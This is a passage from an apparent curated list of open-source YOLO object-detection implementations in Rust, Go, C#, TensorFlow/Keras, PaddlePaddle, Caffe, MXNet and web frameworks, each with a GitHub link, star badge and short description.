[igor-yusupov/rusty-yolo](https://github.com/igor-yusupov/rusty-yolo) <img src="https://img.shields.io/github/stars/igor-yusupov/rusty-yolo?style=social"/> : rusty-yolo. - [gsuyemoto/yolo-rust](https://github.com/gsuyemoto/yolo-rust) <img src="https://img.shields.io/github/stars/gsuyemoto/yolo-rust?style=social"/> : Run YOLO computer vision model using Rust and OpenCV and/or Torch. - [alianse777/darknet-rust](https://github.com/alianse777/darknet-rust) <img src="https://img.shields.io/github/stars/alianse777/darknet-rust?style=social"/> : A Rust wrapper for Darknet, an open source neural network framework written in C and CUDA. [pjreddie.com/darknet/](https://pjreddie.com/darknet/) - [12101111/yolo-rs](https://github.com/12101111/yolo-rs) <img src="https://img.shields.io/github/stars/12101111/yolo-rs?style=social"/> : Yolov3 & Yolov4 with TVM and rust. - [TKGgunter/yolov4_tiny_rs](https://github.com/TKGgunter/yolov4_tiny_rs) <img src="https://img.shields.io/github/stars/TKGgunter/yolov4_tiny_rs?style=social"/> : A rust implementation of yolov4_tiny algorithm. - [flixstn/You-Only-Look-Once](https://github.com/flixstn/You-Only-Look-Once) <img src="https://img.shields.io/github/stars/flixstn/You-Only-Look-Once?style=social"/> : A Rust implementation of Yolo for object detection and tracking. - [lenna-project/yolo-plugin](https://github.com/lenna-project/yolo-plugin) <img src="https://img.shields.io/github/stars/lenna-project/yolo-plugin?style=social"/> : Yolo Object Detection Plugin for Lenna. - [laclouis5/globox-rs](https://github.com/laclouis5/globox-rs) <img src="https://img.shields.io/github/stars/laclouis5/globox-rs?style=social"/> : Object detection toolbox for parsing, converting and evaluating bounding box annotations. - [metobom/tchrs-opencv-webcam-inference](https://github.com/metobom/tchrs-opencv-webcam-inference) <img src="https://img.shields.io/github/stars/metobom/tchrs-opencv-webcam-inference?style=social"/> : This example shows steps for running a Python trained model on webcam feed with opencv and tch-rs. Model will run on GPU. - ### Go Implementation - [LdDl/go-darknet](https://github.com/LdDl/go-darknet) <img src="https://img.shields.io/github/stars/LdDl/go-darknet?style=social"/> : go-darknet: Go bindings for Darknet (Yolo V4, Yolo V7-tiny, Yolo V3). - [adalkiran/distributed-inference](https://github.com/adalkiran/distributed-inference) <img src="https://img.shields.io/github/stars/adalkiran/distributed-inference?style=social"/> : Cross-language and distributed deep learning inference pipeline for WebRTC video streams over Redis Streams. Currently supports YOLOX model, which can run well on CPU. - [wimspaargaren/yolov3](https://github.com/wimspaargaren/yolov3) <img src="https://img.shields.io/github/stars/wimspaargaren/yolov3?style=social"/> : Go implementation of the yolo v3 object detection system. - [wimspaargaren/yolov5](https://github.com/wimspaargaren/yolov5) <img src="https://img.shields.io/github/stars/wimspaargaren/yolov5?style=social"/> : Go implementation of the yolo v5 object detection system. - [genert/real_time_object_detection_go](https://github.com/genert/real_time_object_detection_go) <img src="https://img.shields.io/github/stars/genert/real_time_object_detection_go?style=social"/> : Real Time Object Detection with OpenCV, Go, and Yolo v4. - ### CSharp Implementation - [ML.NET](https://github.com/dotnet/machinelearning) <img src="https://img.shields.io/github/stars/dotnet/machinelearning?style=social"/> : ML.NET is an open source and cross-platform machine learning framework for .NET. - [TorchSharp](https://github.com/dotnet/TorchSharp) <img src="https://img.shields.io/github/stars/dotnet/TorchSharp?style=social"/> : A .NET library that provides access to the library that powers PyTorch. - [TensorFlow.NET](https://github.com/SciSharp/TensorFlow.NET) <img src="https://img.shields.io/github/stars/SciSharp/TensorFlow.NET?style=social"/> : .NET Standard bindings for Google's TensorFlow for developing, training and deploying Machine Learning models in C# and F#. - [DlibDotNet](https://github.com/takuya-takeuchi/DlibDotNet) <img src="https://img.shields.io/github/stars/takuya-takeuchi/DlibDotNet?style=social"/> : Dlib .NET wrapper written in C++ and C# for Windows, MacOS, Linux and iOS. - [DiffSharp](https://github.com/DiffSharp/DiffSharp) <img src="https://img.shields.io/github/stars/DiffSharp/DiffSharp?style=social"/> : DiffSharp: Differentiable Functional Programming. - [dme-compunet/YOLOv8](https://github.com/dme-compunet/YOLOv8) <img src="https://img.shields.io/github/stars/dme-compunet/YOLOv8?style=social"/> : Use YOLOv8 in real-time, for object detection, instance segmentation, pose estimation and image classification, via ONNX Runtime. - [techwingslab/yolov5-net](https://github.com/techwingslab/yolov5-net) <img src="https://img.shields.io/github/stars/techwingslab/yolov5-net?style=social"/> : YOLOv5 object detection with C#, ML.NET, ONNX. - [sstainba/Yolov8.Net](https://github.com/sstainba/Yolov8.Net) <img src="https://img.shields.io/github/stars/sstainba/Yolov8.Net?style=social"/> : A .net 6 implementation to use Yolov5 and Yolov8 models via the ONNX Runtime. - [Alturos.Yolo](https://github.com/AlturosDestinations/Alturos.Yolo) <img src="https://img.shields.io/github/stars/AlturosDestinations/Alturos.Yolo?style=social"/> : C# Yolo Darknet Wrapper (real-time object detection). - [ivilson/Yolov7net](https://github.com/ivilson/Yolov7net) <img src="https://img.shields.io/github/stars/ivilson/Yolov7net?style=social"/> : Yolov7 Detector for .Net 6. - [sangyuxiaowu/ml_yolov7](https://github.com/sangyuxiaowu/ml_yolov7) <img src="https://img.shields.io/github/stars/sangyuxiaowu/ml_yolov7?style=social"/> : ML.NET Yolov7. "ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๆก‘ๆฆ†่‚–็‰ฉใ€ใ€Š[YOLOv7 ๅœจ ML.NET ไธญไฝฟ็”จ ONNX ๆฃ€ๆต‹ๅฏน่ฑก](https://mp.weixin.qq.com/s/vXz6gavYJR2mh5KuJO_slA)ใ€‹" - [keijiro/TinyYOLOv2Barracuda](https://github.com/keijiro/TinyYOLOv2Barracuda) <img src="https://img.shields.io/github/stars/keijiro/TinyYOLOv2Barracuda?style=social"/> : Tiny YOLOv2 on Unity Barracuda. - [derenlei/Unity_Detection2AR](https://github.com/derenlei/Unity_Detection2AR) <img src="https://img.shields.io/github/stars/derenlei/Unity_Detection2AR?style=social"/> : Localize 2D image object detection in 3D Scene with Yolo in Unity Barracuda and ARFoundation. - [died/YOLO3-With-OpenCvSharp4](https://github.com/died/YOLO3-With-OpenCvSharp4) <img src="https://img.shields.io/github/stars/died/YOLO3-With-OpenCvSharp4?style=social"/> : Demo of implement YOLO v3 with OpenCvSharp v4 on C#. - [mbaske/yolo-unity](https://github.com/mbaske/yolo-unity) <img src="https://img.shields.io/github/stars/mbaske/yolo-unity?style=social"/> : YOLO In-Game Object Detection for Unity (Windows). - [BobLd/YOLOv4MLNet](https://github.com/BobLd/YOLOv4MLNet) <img src="https://img.shields.io/github/stars/BobLd/YOLOv4MLNet?style=social"/> : Use the YOLO v4 and v5 (ONNX) models for object detection in C# using ML.Net. - [keijiro/YoloV4TinyBarracuda](https://github.com/keijiro/YoloV4TinyBarracuda) <img src="https://img.shields.io/github/stars/keijiro/YoloV4TinyBarracuda?style=social"/> : YoloV4TinyBarracuda is an implementation of the YOLOv4-tiny object detection model on the Unity Barracuda neural network inference library. - [zhang8043/YoloWrapper](https://github.com/zhang8043/YoloWrapper) <img src="https://img.shields.io/github/stars/zhang8043/YoloWrapper?style=social"/> : C#ๅฐ่ฃ…YOLOv4็ฎ—ๆณ•่ฟ›่กŒ็›ฎๆ ‡ๆฃ€ๆต‹ใ€‚ - [maalik0786/FastYolo](https://github.com/maalik0786/FastYolo) <img src="https://img.shields.io/github/stars/maalik0786/FastYolo?style=social"/> : Fast Yolo for fast initializing, object detection and tracking. - [Uehwan/CSharp-Yolo-Video](https://github.com/Uehwan/CSharp-Yolo-Video) <img src="https://img.shields.io/github/stars/Uehwan/CSharp-Yolo-Video?style=social"/> : C# Yolo for Video. - [HTTP123-A/HumanDetection_Yolov5NET](https://github.com/https://github.com/HTTP123-A/HumanDetection_Yolov5NET) <img src="https://img.shields.io/github/stars/HTTP123-A/HumanDetection_Yolov5NET?style=social"/> : YOLOv5 object detection with ML.NET, ONNX. - [Celine-Hsieh/Hand_Gesture_Training--yolov4](https://github.com/Celine-Hsieh/Hand_Gesture_Training--yolov4) <img src="https://img.shields.io/github/stars/Celine-Hsieh/Hand_Gesture_Training--yolov4?style=social"/> : Recognize the gestures' features using the YOLOv4 algorithm. - [lin-tea/YOLOv5DetectionWithCSharp](https://github.com/lin-tea/YOLOv5DetectionWithCSharp) <img src="https://img.shields.io/github/stars/lin-tea/YOLOv5DetectionWithCSharp?style=social"/> : YOLOv5s inference In C# and Training In Python. - [MirCore/Unity-Object-Detection-and-Localization-with-VR](https://github.com/MirCore/Unity-Object-Detection-and-Localization-with-VR) <img src="https://img.shields.io/github/stars/MirCore/Unity-Object-Detection-and-Localization-with-VR?style=social"/> : Detect and localize objects from the front-facing camera image of a VR Headset in a 3D Scene in Unity using Yolo and Barracuda. - [CarlAreDHopen-eaton/YoloObjectDetection](https://github.com/CarlAreDHopen-eaton/YoloObjectDetection) <img src="https://img.shields.io/github/stars/CarlAreDHopen-eaton/YoloObjectDetection?style=social"/> : Yolo Object Detection Application for RTSP streams. - [TimothyMeadows/Yolo6.NetCore](https://github.com/TimothyMeadows/Yolo6.NetCore) <img src="https://img.shields.io/github/stars/TimothyMeadows/Yolo6.NetCore?style=social"/> : You Only Look Once (v6) for .NET Core LTS. - [mwetzko/EasyYoloDarknet](https://github.com/mwetzko/EasyYoloDarknet) <img src="https://img.shields.io/github/stars/mwetzko/EasyYoloDarknet?style=social"/> : EasyYoloDarknet. - [mwetzko/EasyYoloDarknet](https://github.com/mwetzko/EasyYoloDarknet) <img src="https://img.shields.io/github/stars/mwetzko/EasyYoloDarknet?style=social"/> : Windows optimized Yolo / Darknet Compile, Train and Detect. - [cj-mills/Unity-OpenVINO-YOLOX](https://github.com/cj-mills/Unity-OpenVINO-YOLOX) <img src="https://img.shields.io/github/stars/cj-mills/Unity-OpenVINO-YOLOX?style=social"/> : This tutorial series covers how to perform object detection in the Unity game engine with the OpenVINOโ„ข Toolkit. - [natml-hub/YOLOX](https://github.com/natml-hub/YOLOX) <img src="https://img.shields.io/github/stars/natml-hub/YOLOX?style=social"/> : High performance object detector based on YOLO series. - [thisistherealdiana/YOLO_project](https://github.com/thisistherealdiana/YOLO_project) <img src="https://img.shields.io/github/stars/thisistherealdiana/YOLO_project?style=social"/> : YOLO project made by Diana Kereselidze. - [oujunke/Yolo5Net](https://github.com/oujunke/Yolo5Net) <img src="https://img.shields.io/github/stars/oujunke/Yolo5Net?style=social"/> : Yolo5ๅฎž็ŽฐไบŽTensorFlow.Net. - [wojciechp6/YOLO-UnityBarracuda](https://github.com/wojciechp6/YOLO-UnityBarracuda) <img src="https://img.shields.io/github/stars/wojciechp6/YOLO-UnityBarracuda?style=social"/> : Object detection app build on Unity Barracuda and YOLOv2 Tiny. - [RaminAbbaszadi/YoloWrapper-WPF](https://github.com/RaminAbbaszadi/YoloWrapper-WPF) <img src="https://img.shields.io/github/stars/RaminAbbaszadi/YoloWrapper-WPF?style=social"/> : WPF (C#) Yolo Darknet Wrapper. - [fengyhack/YoloWpf](https://github.com/fengyhack/YoloWpf) <img src="https://img.shields.io/github/stars/fengyhack/YoloWpf?style=social"/> : GUI demo for Object Detection with YOLO and OpenCVSharp. - [hanzhuang111/Yolov5Wpf](https://github.com/hanzhuang111/Yolov5Wpf) <img src="https://img.shields.io/github/stars/hanzhuang111/Yolov5Wpf?style=social"/> : ไฝฟ็”จML.NET้ƒจ็ฝฒYOLOV5 ็š„ONNXๆจกๅž‹ใ€‚ - [MaikoKingma/yolo-winforms-test](https://github.com/MaikoKingma/yolo-winforms-test) <img src="https://img.shields.io/github/stars/MaikoKingma/yolo-winforms-test?style=social"/> : A Windows forms application that can execute pre-trained object detection models via ML.NET. In this instance the You Only Look Once version 4 (yolov4) is used. - [SeanAnd/WebcamObjectDetection](https://github.com/SeanAnd/WebcamObjectDetection) <img src="https://img.shields.io/github/stars/SeanAnd/WebcamObjectDetection?style=social"/> : YOLO object detection using webcam in winforms. - [Devmawi/BlazorObjectDetection-Sample](https://github.com/Devmawi/BlazorObjectDetection-Sample) <img src="https://img.shields.io/github/stars/Devmawi/BlazorObjectDetection-Sample?style=social"/> : Simple project for demonstrating how to embed a continuously object detection with Yolo on a video in a hybrid Blazor app (WebView2). - [Soju06/yolov5-annotation-viewer](https://github.com/Soju06/yolov5-annotation-viewer) <img src="https://img.shields.io/github/stars/Soju06/yolov5-annotation-viewer?style=social"/> : yolov5 annotation viewer. - [developer-ken/YoloPredictorMLDotNet](https://github.com/developer-ken/YoloPredictorMLDotNet) <img src="https://img.shields.io/github/stars/developer-ken/YoloPredictorMLDotNet?style=social"/> : YoloPredictorMLDotNet. - [LionelC-Kyo/CSharp_YoloV5_Torch](https://github.com/LionelC-Kyo/CSharp_YoloV5_Torch) <img src="https://img.shields.io/github/stars/LionelC-Kyo/CSharp_YoloV5_Torch?style=social"/> : Run Yolo V5 in C# By Torch. - [wanglvhang/OnnxYoloDemo](https://github.com/wanglvhang/OnnxYoloDemo) <img src="https://img.shields.io/github/stars/wanglvhang/OnnxYoloDemo?style=social"/> : demo of using c# to run yolo onnx model with onnx runtime, and contains a windows capture tool to get bitmap from windows desktop and window. - [BobLd/YOLOv3MLNet](https://github.com/BobLd/YOLOv3MLNet) <img src="https://img.shields.io/github/stars/BobLd/YOLOv3MLNet?style=social"/> : Use the YOLO v3 (ONNX) model for object detection in C# using ML.Net. - [zgabi/Yolo.Net](https://github.com/zgabi/Yolo.Net) <img src="https://img.shields.io/github/stars/zgabi/Yolo.Net?style=social"/> : zgabi/Yolo.Net - [aliardan/RoadMarkingDetection](https://github.com/aliardan/RoadMarkingDetection) <img src="https://img.shields.io/github/stars/aliardan/RoadMarkingDetection?style=social"/> : Road markings detection using yolov5 model based on ONNX. - [TimothyMeadows/Yolo5.NetCore](https://github.com/TimothyMeadows/Yolo5.NetCore) <img src="https://img.shields.io/github/stars/TimothyMeadows/Yolo5.NetCore?style=social"/> : You Only Look Once (v5) for .NET Core LTS. - [AD-HO/YOLOv5-ML.NET](https://github.com/AD-HO/YOLOv5-ML.NET) <img src="https://img.shields.io/github/stars/AD-HO/YOLOv5-ML.NET?style=social"/> : Inferencing Yolov5 ONNX model using ML.NET and ONNX Runtime. - [ToxicSkill/YOLOV7-Webcam-inference](https://github.com/ToxicSkill/YOLOV7-Webcam-inference) <img src="https://img.shields.io/github/stars/ToxicSkill/YOLOV7-Webcam-inference?style=social"/> : Simple WPF program for webcam inference with yoloV7 models. - [aliardan/RoadMarkingDetection](https://github.com/aliardan/RoadMarkingDetection) <img src="https://img.shields.io/github/stars/aliardan/RoadMarkingDetection?style=social"/> : Road markings detection using yolov5 model based on ONNX. - [rabbitsun2/csharp_and_microsoft_ml_and_yolo_v5_sample](https://github.com/rabbitsun2/csharp_and_microsoft_ml_and_yolo_v5_sample) <img src="https://img.shields.io/github/stars/rabbitsun2/csharp_and_microsoft_ml_and_yolo_v5_sample?style=social"/> : C#, Microsoft ML, Yolo v5, Microsoft ML.DNN, OpenCVSharp4 ์—ฐ๊ณ„ ํ”„๋กœ์ ํŠธ. - [hsysfan/YOLOv5-Seg-OnnxRuntime](https://github.com/hsysfan/YOLOv5-Seg-OnnxRuntime) <img src="https://img.shields.io/github/stars/hsysfan/YOLOv5-Seg-OnnxRuntime?style=social"/> : YOLOv5 Segmenation Implementation in C# and OnnxRuntime. - [dme-compunet/YOLOv8](https://github.com/dme-compunet/YOLOv8) <img src="https://img.shields.io/github/stars/dme-compunet/YOLOv8?style=social"/> : Use YOLOv8 in real-time, for object detection, instance segmentation, pose estimation and image classification, via ONNX Runtime. - ### Tensorflow and Keras Implementation - [YunYang1994/tensorflow-yolov3](https://github.com/YunYang1994/tensorflow-yolov3) <img src="https://img.shields.io/github/stars/YunYang1994/tensorflow-yolov3?style=social"/> : ๐Ÿ”ฅ TensorFlow Code for technical report: "YOLOv3: An Incremental Improvement". - [zzh8829/yolov3-tf2](https://github.com/zzh8829/yolov3-tf2) <img src="https://img.shields.io/github/stars/zzh8829/yolov3-tf2?style=social"/> : YoloV3 Implemented in Tensorflow 2.0. - [hunglc007/tensorflow-yolov4-tflite](https://github.com/hunglc007/tensorflow-yolov4-tflite) <img src="https://img.shields.io/github/stars/hunglc007/tensorflow-yolov4-tflite?style=social"/> : YOLOv4, YOLOv4-tiny, YOLOv3, YOLOv3-tiny Implemented in Tensorflow 2.0, Android. Convert YOLO v4 .weights tensorflow, tensorrt and tflite. - [gliese581gg/YOLO_tensorflow](https://github.com/gliese581gg/YOLO_tensorflow) <img src="https://img.shields.io/github/stars/gliese581gg/YOLO_tensorflow?style=social"/> : tensorflow implementation of 'YOLO : Real-Time Object Detection'. - [llSourcell/YOLO_Object_Detection](https://github.com/llSourcell/YOLO_Object_Detection) <img src="https://img.shields.io/github/stars/llSourcell/YOLO_Object_Detection?style=social"/> : This is the code for "YOLO Object Detection" by Siraj Raval on Youtube. - [wizyoung/YOLOv3_TensorFlow](https://github.com/wizyoung/YOLOv3_TensorFlow) <img src="https://img.shields.io/github/stars/wizyoung/YOLOv3_TensorFlow?style=social"/> : Complete YOLO v3 TensorFlow implementation. Support training on your own dataset. - [theAIGuysCode/yolov4-deepsort](https://github.com/theAIGuysCode/yolov4-deepsort) <img src="https://img.shields.io/github/stars/theAIGuysCode/yolov4-deepsort?style=social"/> : Object tracking implemented with YOLOv4, DeepSort, and TensorFlow. - [mystic123/tensorflow-yolo-v3](https://github.com/mystic123/tensorflow-yolo-v3) <img src="https://img.shields.io/github/stars/mystic123/tensorflow-yolo-v3?style=social"/> : Implementation of YOLO v3 object detector in Tensorflow (TF-Slim). - [hizhangp/yolo_tensorflow](https://github.com/hizhangp/yolo_tensorflow) <img src="https://img.shields.io/github/stars/hizhangp/yolo_tensorflow?style=social"/> : Tensorflow implementation of YOLO, including training and test phase. - [nilboy/tensorflow-yolo](https://github.com/nilboy/tensorflow-yolo) <img src="https://img.shields.io/github/stars/nilboy/tensorflow-yolo?style=social"/> : tensorflow implementation of 'YOLO : Real-Time Object Detection'(train and test). - [qqwweee/keras-yolo3](https://github.com/qqwweee/keras-yolo3) <img src="https://img.shields.io/github/stars/qqwweee/keras-yolo3?style=social"/> : A Keras implementation of YOLOv3 (Tensorflow backend). - [allanzelener/YAD2K](https://github.com/allanzelener/YAD2K) <img src="https://img.shields.io/github/stars/allanzelener/YAD2K?style=social"/> : YAD2K: Yet Another Darknet 2 Keras. - [experiencor/keras-yolo2](https://github.com/experiencor/keras-yolo2) <img src="https://img.shields.io/github/stars/experiencor/keras-yolo2?style=social"/> : YOLOv2 in Keras and Applications. - [experiencor/keras-yolo3](https://github.com/experiencor/keras-yolo3) <img src="https://img.shields.io/github/stars/experiencor/keras-yolo3?style=social"/> : Training and Detecting Objects with YOLO3. - [SpikeKing/keras-yolo3-detection](https://github.com/SpikeKing/keras-yolo3-detection) <img src="https://img.shields.io/github/stars/SpikeKing/keras-yolo3-detection?style=social"/> : YOLO v3 ็‰ฉไฝ“ๆฃ€ๆต‹็ฎ—ๆณ•ใ€‚ - [xiaochus/YOLOv3](https://github.com/xiaochus/YOLOv3) <img src="https://img.shields.io/github/stars/xiaochus/YOLOv3?style=social"/> : Keras implementation of yolo v3 object detection. - [bubbliiiing/yolo3-keras](https://github.com/bubbliiiing/yolo3-keras) <img src="https://img.shields.io/github/stars/bubbliiiing/yolo3-keras?style=social"/> : ่ฟ™ๆ˜ฏไธ€ไธชyolo3-keras็š„ๆบ็ ๏ผŒๅฏไปฅ็”จไบŽ่ฎญ็ปƒ่‡ชๅทฑ็š„ๆจกๅž‹ใ€‚ - [bubbliiiing/yolov4-keras](https://github.com/bubbliiiing/yolov4-keras) <img src="https://img.shields.io/github/stars/bubbliiiing/yolov4-keras?style=social"/> : ่ฟ™ๆ˜ฏไธ€ไธชYoloV4-keras็š„ๆบ็ ๏ผŒๅฏไปฅ็”จไบŽ่ฎญ็ปƒ่‡ชๅทฑ็š„ๆจกๅž‹ใ€‚ - [bubbliiiing/yolov4-tf2](https://github.com/bubbliiiing/yolov4-tf2) <img src="https://img.shields.io/github/stars/bubbliiiing/yolov4-tf2?style=social"/> : ่ฟ™ๆ˜ฏไธ€ไธชyolo4-tf2๏ผˆtensorflow2๏ผ‰็š„ๆบ็ ๏ผŒๅฏไปฅ็”จไบŽ่ฎญ็ปƒ่‡ชๅทฑ็š„ๆจกๅž‹ใ€‚ - [bubbliiiing/yolov4-tiny-tf2](https://github.com/bubbliiiing/yolov4-tiny-tf2) <img src="https://img.shields.io/github/stars/bubbliiiing/yolov4-tiny-tf2?style=social"/> : ่ฟ™ๆ˜ฏไธ€ไธชYoloV4-tiny-tf2็š„ๆบ็ ๏ผŒๅฏไปฅ็”จไบŽ่ฎญ็ปƒ่‡ชๅทฑ็š„ๆจกๅž‹ใ€‚ - [pythonlessons/TensorFlow-2.x-YOLOv3](https://github.com/pythonlessons/TensorFlow-2.x-YOLOv3) <img src="https://img.shields.io/github/stars/pythonlessons/TensorFlow-2.x-YOLOv3?style=social"/> : YOLOv3 implementation in TensorFlow 2.3.1. - [miemie2013/Keras-YOLOv4](https://github.com/miemie2013/Keras-YOLOv4) <img src="https://img.shields.io/github/stars/miemie2013/Keras-YOLOv4?style=social"/> : PPYOLO AND YOLOv4. - [Ma-Dan/keras-yolo4](https://github.com/Ma-Dan/keras-yolo4) <img src="https://img.shields.io/github/stars/Ma-Dan/keras-yolo4?style=social"/> : A Keras implementation of YOLOv4 (Tensorflow backend). - [miranthajayatilake/YOLOw-Keras](https://github.com/miranthajayatilake/YOLOw-Keras) <img src="https://img.shields.io/github/stars/miranthajayatilake/YOLOw-Keras?style=social"/> : YOLOv2 Object Detection w/ Keras (in just 20 lines of code). - [maiminh1996/YOLOv3-tensorflow](https://github.com/maiminh1996/YOLOv3-tensorflow) <img src="https://img.shields.io/github/stars/maiminh1996/YOLOv3-tensorflow?style=social"/> : Re-implement YOLOv3 with TensorFlow. - [Stick-To/Object-Detection-Tensorflow](https://github.com/Stick-To/Object-Detection-Tensorflow) <img src="https://img.shields.io/github/stars/Stick-To/Object-Detection-Tensorflow?style=social"/> : Object Detection API Tensorflow. - [avBuffer/Yolov5_tf](https://github.com/avBuffer/Yolov5_tf) <img src="https://img.shields.io/github/stars/avBuffer/Yolov5_tf?style=social"/> : Yolov5/Yolov4/ Yolov3/ Yolo_tiny in tensorflow. - [ruiminshen/yolo-tf](https://github.com/ruiminshen/yolo-tf) <img src="https://img.shields.io/github/stars/ruiminshen/yolo-tf?style=social"/> : TensorFlow implementation of the YOLO (You Only Look Once). - [xiao9616/yolo4_tensorflow2](https://github.com/xiao9616/yolo4_tensorflow2) <img src="https://img.shields.io/github/stars/xiao9616/yolo4_tensorflow2?style=social"/> : yolo 4th edition implemented by tensorflow2.0. - [sicara/tf2-yolov4](https://github.com/sicara/tf2-yolov4) <img src="https://img.shields.io/github/stars/sicara/tf2-yolov4?style=social"/> : A TensorFlow 2.0 implementation of YOLOv4: Optimal Speed and Accuracy of Object Detection. - [LongxingTan/Yolov5](https://github.com/LongxingTan/Yolov5) <img src="https://img.shields.io/github/stars/LongxingTan/Yolov5?style=social"/> : Efficient implementation of YOLOV5 in TensorFlow2. - [geekjr/quickai](https://github.com/geekjr/quickai) <img src="https://img.shields.io/github/stars/geekjr/quickai?style=social"/> : QuickAI is a Python library that makes it extremely easy to experiment with state-of-the-art Machine Learning models. - [CV_Lab/yolov5_rt_tfjs](https://gitee.com/CV_Lab/yolov5_rt_tfjs) : ๐Ÿš€ ๅŸบไบŽTensorFlow.js็š„YOLOv5ๅฎžๆ—ถ็›ฎๆ ‡ๆฃ€ๆต‹้กน็›ฎใ€‚ - [Burf/TFDetection](https://github.com/Burf/TFDetection) <img src="https://img.shields.io/github/stars/Burf/TFDetection?style=social"/> : A Detection Toolbox for Tensorflow2. - [taipingeric/yolo-v4-tf.keras](https://github.com/taipingeric/yolo-v4-tf.keras) <img src="https://img.shields.io/github/stars/taipingeric/yolo-v4-tf.keras?style=social"/> : A simple tf.keras implementation of YOLO v4. - [david8862/keras-YOLOv3-model-set](https://github.com/david8862/keras-YOLOv3-model-set) <img src="https://img.shields.io/github/stars/david8862/keras-YOLOv3-model-set?style=social"/> : end-to-end YOLOv4/v3/v2 object detection pipeline, implemented on tf.keras with different technologies. - ### PaddlePaddle Implementation - [PaddlePaddle/PaddleDetection](https://github.com/PaddlePaddle/PaddleDetection) <img src="https://img.shields.io/github/stars/PaddlePaddle/PaddleDetection?style=social"/> : Object Detection toolkit based on PaddlePaddle. "PP-YOLO: An Effective and Efficient Implementation of Object Detector". (**[arXiv 2020](https://arxiv.org/abs/2007.12099)**) - [nemonameless/PaddleDetection_YOLOv5](https://github.com/nemonameless/PaddleDetection_YOLOv5) <img src="https://img.shields.io/github/stars/nemonameless/PaddleDetection_YOLOv5?style=social"/> : YOLOv5 of PaddleDetection, Paddle implementation of YOLOv5. - [nemonameless/PaddleDetection_YOLOX](https://github.com/nemonameless/PaddleDetection_YOLOX) <img src="https://img.shields.io/github/stars/nemonameless/PaddleDetection_YOLOX?style=social"/> : Paddle YOLOX, 51.8% on COCO val by YOLOX-x, 44.6% on YOLOX-ConvNeXt-s. - [nemonameless/PaddleDetection_YOLOset](https://github.com/nemonameless/PaddleDetection_YOLOset) <img src="https://img.shields.io/github/stars/nemonameless/PaddleDetection_YOLOset?style=social"/> : Paddle YOLO set: YOLOv3, PPYOLO, PPYOLOE, YOLOX, YOLOv5, YOLOv7 and so on. - [miemie2013/Paddle-YOLOv4](https://github.com/miemie2013/Paddle-YOLOv4) <img src="https://img.shields.io/github/stars/miemie2013/Paddle-YOLOv4?style=social"/> : Paddle-YOLOv4. - [Sharpiless/PaddleDetection-Yolov5](https://github.com/Sharpiless/PaddleDetection-Yolov5) <img src="https://img.shields.io/github/stars/Sharpiless/PaddleDetection-Yolov5?style=social"/> : ๅŸบไบŽPaddlepaddleๅค็Žฐyolov5๏ผŒๆ”ฏๆŒPaddleDetectionๆŽฅๅฃใ€‚ - [Nioolek/PPYOLOE_pytorch](https://github.com/Nioolek/PPYOLOE_pytorch) <img src="https://img.shields.io/github/stars/Nioolek/PPYOLOE_pytorch?style=social"/> : An unofficial implementation of Pytorch version PP-YOLOE,based on Megvii YOLOX training code. - ### Caffe Implementation - [ChenYingpeng/caffe-yolov3](https://github.com/ChenYingpeng/caffe-yolov3) <img src="https://img.shields.io/github/stars/ChenYingpeng/caffe-yolov3?style=social"/> : A real-time object detection framework of Yolov3/v4 based on caffe. - [ChenYingpeng/darknet2caffe](https://github.com/ChenYingpeng/darknet2caffe) <img src="https://img.shields.io/github/stars/ChenYingpeng/darknet2caffe?style=social"/> : Convert darknet weights to caffemodel. - [eric612/Caffe-YOLOv3-Windows](https://github.com/eric612/Caffe-YOLOv3-Windows) <img src="https://img.shields.io/github/stars/eric612/Caffe-YOLOv3-Windows?style=social"/> : A windows caffe implementation of YOLO detection network. - [Harick1/caffe-yolo](https://github.com/Harick1/caffe-yolo) <img src="https://img.shields.io/github/stars/Harick1/caffe-yolo?style=social"/> : Caffe for YOLO. - [choasup/caffe-yolo9000](https://github.com/choasup/caffe-yolo9000) <img src="https://img.shields.io/github/stars/choasup/caffe-yolo9000?style=social"/> : Caffe for YOLOv2 & YOLO9000. - [gklz1982/caffe-yolov2](https://github.com/gklz1982/caffe-yolov2) <img src="https://img.shields.io/github/stars/gklz1982/caffe-yolov2?style=social"/> : caffe-yolov2. - ### MXNet Implementation - [Gluon CV Toolkit](https://github.com/dmlc/gluon-cv) <img src="https://img.shields.io/github/stars/dmlc/gluon-cv?style=social"/> : GluonCV provides implementations of the state-of-the-art (SOTA) deep learning models in computer vision. - [zhreshold/mxnet-yolo](https://github.com/zhreshold/mxnet-yolo) <img src="https://img.shields.io/github/stars/zhreshold/mxnet-yolo?style=social"/> : YOLO: You only look once real-time object detector. - ### Web Implementation - [ModelDepot/tfjs-yolo-tiny](https://github.com/ModelDepot/tfjs-yolo-tiny) <img src="https://img.shields.io/github/stars/ModelDepot/tfjs-yolo-tiny?style=social"/> : In-Browser Object Detection using Tiny YOLO on Tensorflow.js. - [justadudewhohacks/tfjs-tiny-yolov2](https://github.com/justadudewhohacks/tfjs-tiny-yolov2) <img src="https://img.shields.io/github/stars/justadudewhohacks/tfjs-tiny-yolov2?style=social"/> : Tiny YOLO v2 object detection with tensorflow.js. - [reu2018DL/YOLO-LITE](https://github.com/reu2018DL/YOLO-LITE) <img src="https://img.shields.io/github/stars/reu2018DL/YOLO-LITE?style=social"/> : YOLO-LITE is a web implementation of YOLOv2-tiny. - [mobimeo/node-yolo](https://github.com/mobimeo/node-yolo) <img src="https://img.shields.io/github/stars/mobimeo/node-yolo?style=social"/> : Node bindings for YOLO/Darknet image recognition library. - [Sharpiless/Yolov5-Flask-VUE](https://github.com/Sharpiless/Yolov5-Flask-VUE) <img src="https://img.shields.io/github/stars/Sharpiless/Yolov5-Flask-VUE?style=social"/> : ๅŸบไบŽFlaskๅผ€ๅ‘ๅŽ็ซฏใ€VUEๅผ€ๅ‘ๅ‰็ซฏๆก†ๆžถ๏ผŒๅœจWEB็ซฏ้ƒจ็ฝฒYOLOv5็›ฎๆ ‡ๆฃ€ๆต‹ๆจกๅž‹ใ€‚ - [shaqian/tfjs-yolo](https://github.com/shaqian/tfjs-yolo) <img src="https://img.shields.io/github/stars/shaqian/tfjs-yolo?style=social"/> : YOLO v3 and Tiny YOLO v1, v2, v3 with Tensorflow.js. - [zqingr/tfjs-yolov3](https://github.com/zqingr/tfjs-yolov3) <img src="https://img.shields.io/github/stars/zqingr/tfjs-yolov3?style=social"/> : A Tensorflow js implementation of YOLOv3 and YOLOv3-tiny. - [bennetthardwick/darknet.js](https://github.com/bennetthardwick/darknet.js) <img src="https://img.shields.io/github/stars/bennetthardwick/darknet.js?style=social"/> : A NodeJS wrapper of pjreddie's darknet / 